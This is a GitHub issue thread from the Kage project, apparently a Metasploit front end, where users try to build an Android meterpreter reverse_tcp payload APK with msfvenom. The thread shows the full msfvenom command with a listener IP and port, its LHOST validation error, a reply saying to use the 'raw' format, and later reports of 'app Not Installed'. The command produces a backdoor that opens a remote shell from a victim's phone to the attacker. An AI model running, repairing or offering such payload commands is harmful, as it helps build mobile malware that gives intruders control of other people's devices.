### ISSUE TITLE
i am getting error ? can anyone know how to solve this ?

### ISSUE THREAD

**Issue by Harshpanwar1** [WayzDev/Kage#7]
> msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.29.133 LPORT=4444  -f java -o /root/kage/venom.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: The following options failed to validate: LHOST.
Error: Command failed: msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.29.133 LPORT=4444  -f java -o /root/kage/venom.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: The following options failed to validate: LHOST.

**Comment by Harshpanwar1** [comment]
I am not able to create payload for android . In format which option i should choose

**Comment by Zerx0r** [comment]
the format to generate apk file is `raw`

have a look here,
![Screenshot_2019-04-26_20-21-56](https://user-images.githubusercontent.com/38052394/56822250-87bdf380-6861-11e9-8d6a-70af9a5ef742.png)

**Comment by anonymous1894** [comment]
> the format to generate apk file is `raw`
> 
> have a look here,
> ![Screenshot_2019-04-26_20-21-56](https://user-images.githubusercontent.com/38052394/56822250-87bdf380-6861-11e9-8d6a-70af9a5ef742.png)

hello buddy , where to find payload generator which you have mentioned above?

**Comment by theavezkhatri** [comment]
> the format to generate apk file is `raw`
> 
> have a look here,
> ![Screenshot_2019-04-26_20-21-56](https://user-images.githubusercontent.com/38052394/56822250-87bdf380-6861-11e9-8d6a-70af9a5ef742.png)

Error - app Not Installed
